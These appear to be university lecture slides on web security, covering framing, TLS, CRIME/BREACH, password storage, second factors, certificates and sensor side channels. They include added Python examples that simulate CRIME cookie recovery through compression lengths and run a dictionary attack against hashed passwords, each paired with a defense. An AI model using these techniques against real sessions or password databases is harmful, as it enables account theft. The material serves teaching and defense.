    <iframe name="myframe" src="http://www.google.com/"> This text is ignored by most browsers. </iframe>
  • 74. Frame Busting Goal: prevent web page from loading in a frame § example: opening login page in a frame will display correct passmark image Frame busting: if (top != self) top.location.href = location.href
  • 75. Better Frame Busting. Problem: the framing page can use the JavaScript onUnload event to cancel the navigation that the frame-busting code starts, e.g. <body onUnload="javascript: cause_an_abort;">. Try this instead, so that a framed copy never renders its content: if (top != self) top.location.href = location.href; else { … code of page here … }
  • 76. Summary • Web security goals and threat models • HTTP • Rendering: Html, DOM, embedded content, JavaScript • Isolation: frames, same-origin policy, HTML5 sandboxing • Communication: fragment, post-message, cross-origin request • Frame navigation: Same-origin policy, descendant policy • Client storage: Cookies, Local storage, Native Client • Click-jacking, tap-jacking, frame busting
  • 77. TLS 1.3 Compression attacks Password Breaches Certificates on the Web Abusing Mobile Sensors MODULE 3
  • 78. Topics for this section. TLS attacks and defenses: compression attacks: CRIME and BREACH, TLS 1.3. Password breaches and 2nd factor authentication. Certificate Authorities: compromises, Let's Encrypt, universal TLS. New hardware security support: Intel SGX. Sensor abuse on mobile phones
  • 79. TLS 1.3 Module 3: Attacks and Defenses
  • 80. Review: TLS 1.2 (browser and server; server holds SK). client-hello → server-hello + server-cert (PK) (cert from CA) → key exchange (several options; most common: server authentication only): client-key-exchange: E(PK, k) for random k → Finished → HTTP data encrypted with KDF(k)
  • 81. Review: TLS record encryption (original design). Browser and server share k; plaintext HTTP data is split into 16KB records; each plaintext record gets an integrity tag (MAC), then hdr + record + tag are encrypted under k to give the ciphertext. This encryption method is called MAC-then-encrypt: the reason for many attacks on TLS (BEAST, Lucky13, POODLE, …). Why?
  • 82. TLS 1.3: a new version of TLS (2017) Record encryption: • mandatory method: AES128-GCM fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte • On weaker processors: CHACHA20_POLY1305 fast in software Both methods provide authenticated encryption
  • 83. TLS 1.3: a new version of TLS (2017) Session setup: • Forward secrecy required (non-forward secure method is deprecated) • Zero round-trip setup option: client can send encrypted data on first flow (after client-hello) • Server certificate is encrypted (previously, sent in the clear) stronger privacy when server has multiple certificates • Initiate TLS session from a pre-shared secret, if one exists more general than session-resume in TLS 1.2
  • 85. Compression and Encryption Strong desire to combine compression and encryption How? Option 1: first encrypt and then compress Does not work … ciphertext looks like a random string
  • 86. Compression and Encryption. Option 2: first compress and then encrypt. Used in many Internet protocols (TLS, HTTPS, QUIC, …). Recall in TLS: 16KB records, with support for compression before encryption. Example request: POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg
  • 87. Trouble … [Kelsey’02] Compress-then-encrypt reveals information: POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg POST /bank.com/buy?id=goog Cookie: uid=JhPL8g69684rksfsdg Second message compresses better than first: network observer can distinguish the two messages!
  • 88. Even worse: the CRIME attack [RD’2012] (simplified). Goal: steal user’s bank cookie. Attacker JavaScript can issue requests to Bank, but cannot read the Cookie value. Request: POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg Host: bank.com
  • 89. CRIME (simplified): observe ciphertext size for POST /bank.com/buy?uid=A11111… Cookie: uid=JhPL8g69684rksfsdg Host: bank.com (16KB record)
  • 90. CRIME (simplified): observe ciphertext size for POST /bank.com/buy?uid=B11111… Cookie: uid=JhPL8g69684rksfsdg Host: bank.com (16KB record)
  • 91. CRIME (simplified): POST /bank.com/buy?uid=J11111… Cookie: uid=JhPL8g69684rksfsdg Host: bank.com (16KB record). Ciphertext size is slightly shorter ⇒ first character of Cookie is “J”
  • 92. CRIME (simplified): observe ciphertext size for POST /bank.com/buy?uid=Ja1111… Cookie: uid=JhPL8g69684rksfsdg Host: bank.com (16KB record)
  • 93. CRIME (simplified): POST /bank.com/buy?uid=Jh1111… Cookie: uid=JhPL8g69684rksfsdg Host: bank.com (16KB record). Ciphertext size is slightly shorter ⇒ 2nd character of Cookie is “h”
  • 94. CRIME (simplified): recover entire cookie after 256 × (len of Cookie) attempts; takes several seconds
  • 95. What to do? The problem: Observed ciphertext length reveals compression amount ⇒ reveals plaintext info … no good solution Non-defense: add a random length pad to ciphertext First defense: compression disabled in TLS (and others, e.g., SPDY) Problem: compression also done in HTTP layer ⇒ BREACH attack [PHG’13] … much harder to disable HTTP compression in practice
  • 96. What to do? [PHG’13] Many web sites are impacted … A proposed defense: › Application layer “tags” sensitive data fields in HTTP requests and responses (cookies, PII, etc.) › HTTP-level compression only applied to non-sensitive fields … but not easy to implement
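Added example, not from the slides: Python using the standard zlib module to reproduce the length leak of slides 87–94 on the slide's own request, next to the tagged-field defense of slide 96 (compress only the non-sensitive part and send the Cookie line uncompressed). The filler after the guessed character and the guess alphabet are constructed; static Huffman coding (Z_FIXED) is selected so that record sizes depend only on the back-references found.

```python
import string
import zlib

COOKIE = "uid=JhPL8g69684rksfsdg"        # the secret cookie value from slide 88
ALPHABET = string.ascii_letters + string.digits   # constructed guess alphabet


def compressed_len(data: bytes) -> int:
    """Bytes on the wire after compress-then-encrypt (encryption adds only a constant).
    Z_FIXED forces static Huffman codes, so size differences come from matches alone."""
    z = zlib.compressobj(9, strategy=zlib.Z_FIXED)
    return len(z.compress(data) + z.flush())


def request(guess: str) -> bytes:
    """Request the attacker's script triggers; the filler occurs nowhere else in it."""
    return (f"POST /bank.com/buy?uid={guess}@#$%\r\n"
            f"Cookie: {COOKIE}\r\n"
            f"Host: bank.com\r\n").encode()


def leaky_sizes(alphabet=ALPHABET) -> dict:
    """Whole request compressed, as TLS/SPDY did: only guess 'J' extends the match 'uid=J'."""
    return {g: compressed_len(request(g)) for g in alphabet}


def tagged_sizes(alphabet=ALPHABET) -> dict:
    """Slide 96 defense: the Cookie line is tagged sensitive and excluded from compression."""
    sizes = {}
    for g in alphabet:
        public = f"POST /bank.com/buy?uid={g}@#$%\r\nHost: bank.com\r\n".encode()
        sensitive = f"Cookie: {COOKIE}\r\n".encode()     # sent uncompressed
        sizes[g] = compressed_len(public) + len(sensitive)
    return sizes


def smallest(sizes: dict) -> list:
    """Guesses whose record is shortest; for leaky_sizes this singles out 'J'."""
    best = min(sizes.values())
    return sorted(g for g, s in sizes.items() if s == best)
```

With the Cookie line excluded from compression every guess yields the same length, at the cost of sending that line uncompressed.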
  • 98. A (small) sample of password breaches 2012: Linked-in: 6 million passwords (hashed, unsalted) 2013: Twitter: 250,000 passwords (hashed, salted) Evernote: 50 million records: usernames, emails, hashed passwords Adobe: 38 million records email addrs., password hints, and encrypted passwords 2015: LastPass: stolen email addr., hashed master passwords (and salts) (server-side compromise)
  • 99. Weak password choice: a common occurrence; users frequently choose weak passwords. Example: the RockYou password list, 2009 (6 most common pwds): 123456, 12345, Password, iloveyou, princess, abc123. A list of 360,000,000 words covers about 25% of user passwords. Adobe list, 2013 (password: fraction of users): 123456: 5%; 123456789: 1.1%; password: 0.9%; adobe123: 0.5%; 12345678: 0.5%; qwerty: 0.5%; 1234567: 0.3%; total: 8.8%
  • 100. How to store passwords. First rule of password storage: never store passwords in the clear! The password database stores, per id, a salt and a hash: Alice: SA, H(pwA, SA); Bob: SB, H(pwB, SB); … To validate a given password pwA for Alice the server checks: H(pwA, SA) ≟ StoredHash(Alice)
  • 101. How to hash? Linked-in: SHA-1 hashed (unsalted) passwords ⇒ 6 days, 90% of pwds. recovered by exhaustive search The problem: SHA-1 is too fast … attacker can try all words in dictionary To hash passwords: • Use a keyed hash function (e.g., HMAC) where key stored in HSM • In addition: use a slow, space-hard function
  • 102. How to hash? PBKDF2, bcrypt: slow hash functions • Slowness by “iterating” a crypto hash function like SHA256 • Parameterized number of iterations (e.g., set for 1000 evals/sec) Problem: custom hardware (e.g., GPU) can evaluate hash function much faster than a commodity CPU ⇒ attacker can do dictionary attack much faster than 1000 evals/sec.
  • 103. Why is custom hardware faster? Only a small part of the CPU is used to hash. Chart: Intel x86 (Skylake) 93 vs. custom hardware for Bitcoin mining, Antminer S7 ($1,695, 5.06 TH/s) 5060, about 50x
  • 104. How to hash? Scrypt: a slow hash function AND need lots of memory to evaluate ⇒ custom hardware not much faster than commodity CPU Problem: memory access pattern depends on input password ⇒ local attacker can learn memory access pattern for user’s pwd ⇒ eliminates need for memory in an offline dictionary attack Is there a space-hard function where time is independent of pwd? • Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
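Added example, not from the slides: Python (hashlib and hmac from the standard library) contrasting the unsalted fast hash of slide 101 with a salted, memory-hard scrypt record of slide 104, and counting how many hash evaluations a dictionary of the six RockYou words from slide 99 costs against each. User names, the third password and the cost parameters are constructed.

```python
import hashlib
import hmac
import os

# Six most common RockYou passwords, as listed on slide 99 (used as the "dictionary").
COMMON_WORDS = ["123456", "12345", "Password", "iloveyou", "princess", "abc123"]


def unsalted_sha1(pw: str) -> bytes:
    """The LinkedIn-style scheme from slide 101: fast and unsalted."""
    return hashlib.sha1(pw.encode()).digest()


def make_record(pw: str, salt: bytes = None, n: int = 2**14) -> dict:
    """Salted, memory-hard record (slides 100 and 104). n is the scrypt cost parameter;
    2**14 is a demonstration value, tuned in practice to the server's latency budget."""
    salt = salt if salt is not None else os.urandom(16)   # fresh random salt per user
    h = hashlib.scrypt(pw.encode(), salt=salt, n=n, r=8, p=1, dklen=32)
    return {"salt": salt, "n": n, "hash": h}


def verify(pw: str, rec: dict) -> bool:
    h = hashlib.scrypt(pw.encode(), salt=rec["salt"], n=rec["n"], r=8, p=1, dklen=32)
    return hmac.compare_digest(h, rec["hash"])   # constant-time comparison


def dictionary_cost_unsalted(db: dict, words) -> tuple:
    """db maps user -> unsalted SHA-1. One hash per word serves every user at once."""
    table = {unsalted_sha1(w): w for w in words}          # len(words) hash evaluations
    found = {user: table[h] for user, h in db.items() if h in table}
    return found, len(words)


def dictionary_cost_salted(db: dict, words) -> tuple:
    """db maps user -> salted scrypt record. Every (user, word) pair needs its own slow hash."""
    found, evaluations = {}, 0
    for user, rec in db.items():
        for w in words:
            evaluations += 1
            if verify(w, rec):
                found[user] = w
                break
    return found, evaluations
```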
  • 105. Strengthening User Authentication. One option: biometrics: fingerprints, retina, facial recognition, … Benefit: hard to forget. Problems: biometrics are not generally secret; cannot be changed, unlike passwords ⇒ Should primarily be used as a second factor authentication (note: CCC’13)
  • 106. 2nd factor OTP authentication. Setup: choose random key k; on device and server: sk = (k, 0). Identification: user computes r0 ← HMAC(k, 0) and sends it; server accepts iff r = HMAC(k, 0); both sides advance to (k, 1), the next response is r1 ← HMAC(k, 1), and so on. Often, time-based updates instead of a counter
  • 107. Google authenticator: 6-digit timed one-time passwords (TOTP) [RFC 6238]. Wide web-site adoption: Gmail, Dropbox, WordPress, … › Open study: 6.4% Gmail user adoption [EuroSec 2015]. To enable TOTP for a user: web site presents QR code with embedded data: otpauth://totp/Example:alice@dropbox.com?secret=JBSWY3DPEHPK3PXP&issuer=Example (subsequent user logins require user to present TOTP). Danger: password reset upon user lockout
  • 109. Server compromise exposes secrets March 2011: RSA announced servers attacked, secret keys stolen ⇒ enabled SecurID user impersonation Can we do better? Answer: Yes!
  • 110. Duo (also FIDO U2F): signature-based challenge response. The user database on the server holds a public key per user: Alice: pkA; Bob: pkB; … Login: user enters pwd on the login page; server sends a 2FA challenge m; the user's device holding sk responds with sign(sk, m); server verifies the signature over the data and confirms. No secrets on server, simple user experience
  • 111. Certificates on the Web Module 3: Attacks and Defenses
  • 112. Certificate Issuance Woes: wrong issuance enables eavesdropping on a user’s session without any warning. 2011: Comodo and DigiNotar RAs hacked, issued certs for Gmail, Yahoo! Mail. 2013: TurkTrust issued a cert for gmail.com (discovered by pinning). 2014: Indian NIC (intermediate CA trusted by the root CA India CCA) issued certs for Google and Yahoo! domains. Result: (1) India CCA revoked NIC’s intermediate certificate; (2) Chrome restricts the India CCA root to only seven Indian domains. 2015: MCS (intermediate CA cert issued by CNNIC) issued certs for Google domains. Result: current CNNIC root no longer recognized by Chrome
  • 113. Man in the middle attack using rogue cert: attacker proxies data between user and bank, sees all traffic and can modify data at will. Browser sends ClientHello to the attacker, who sends its own ClientHello to the bank; the bank returns ServerCert (Bank) and the attacker returns ServerCert (rogue) to the browser (a cert for Bank by a valid CA); two SSL key exchanges yield k1 (browser–attacker) and k2 (attacker–bank); GET https://bank.com and the HTTP data are encrypted with k1 on one leg and k2 on the other
  • 114. What to do? (many good ideas) HPKP: HTTP public-key pinning § HTTP header that lets a site declare CAs that can sign its cert: Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; § on subsequent HTTPS, browser rejects certs issued by other CAs § TOFU: Trust on First Use. Certificate Transparency (CT): [LL’12] § idea: CAs must advertise a log of all certs they issued § Browser will only use a cert if it is on the CT log • Efficient implementation using Merkle hash trees • Companies can scan logs to look for invalid issuance
  • 115. A new CA: Let’s Encrypt (letsencrypt.org). A new open Certificate Authority: free certs • Provisioning via an automated agent running on the web server. Step 1: install agent on web server. Step 2: agent proves domain ownership (e.g. bank.com) by a DNS record under bank.com or a page at a fixed URI at bank.com, and sends a Certificate Signing Request (CSR) to the CA. Step 3: Let’s Encrypt CA checks domain ownership; if valid, it issues the cert and sends it to the agent. Step 4: agent installs cert on web server … done. 2016: 800K certs issued
  • 116. Abusing Mobile Sensors Module 3: Attacks and Defenses
  • 117. Sensors on smart phones: microphone, camera, GPS, light sensor, compass, MEMS gyroscope / accelerometer, power meter, barometer, heart rate / oximeter (on smart watches) (slide note: no user permission required). All have a specific function. Can they be abused??
  • 118. Example 1: fingerprinting. Imperfections in camera sensor can be used to link pictures taken by same phone [LG’06]. Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14] § App can tell if it has been previously installed on device (diagram: app derives a device-id)
  • 119. Example 2: Gyrophone [MBN’14] Phone gyroscope: measures vibrations (used for games) Trouble: › Gyroscope picks up air vibrations (a.k.a speech) › Sample rate (apps.): 200Hz › Machine learning ⇒ can recognize some speech
  • 120. Example 3: Power usage sensor Modern phones measure power drained from battery Enables apps to optimize power use Repeatedly read: /sys/class/power_supply/battery/voltage_now /sys/class/power_supply/battery/current_now Unrestricted access. Can this be abused?
  • 121. Example 3: Power usage sensor Can this be abused? [MBSN’15] Observation: power used by radio depends on distance and obstacles to cell tower
  • 122. So what? Our work: [MBSN’15] power readings + machine learning ⇒ GPS. Why? Routes in a city have unique power fingerprints. Three goals (all three achieved): 1. identify route car is taking among a known set of routes 2. identify car’s location along a known route 3. identify car’s route based on a database of pre-measured short segments
  • 123. Identify location along known route Main tool: dynamic time warping (DTW) ⇒ Aligns pre-recorded data with current samples
  • 125. Lessons Sensors can have unintended consequences There is risk in giving apps direct access to sensors Prevention: • Always require permissions to access sensors • Reduce data from sensors to min needed for utility or only provide abstract view of sensor data
  • 126. Final note: limitations of air gaps. A machine holds sensitive data and is isolated from the network • If it gets infected, can the malware exfiltrate data? Answer: yes! [Usenix Sec 2015] • Mimic GSM signals using the data bus • Use x86 instruction: MOVNTDQ m128, xmm • Effective for 60 feet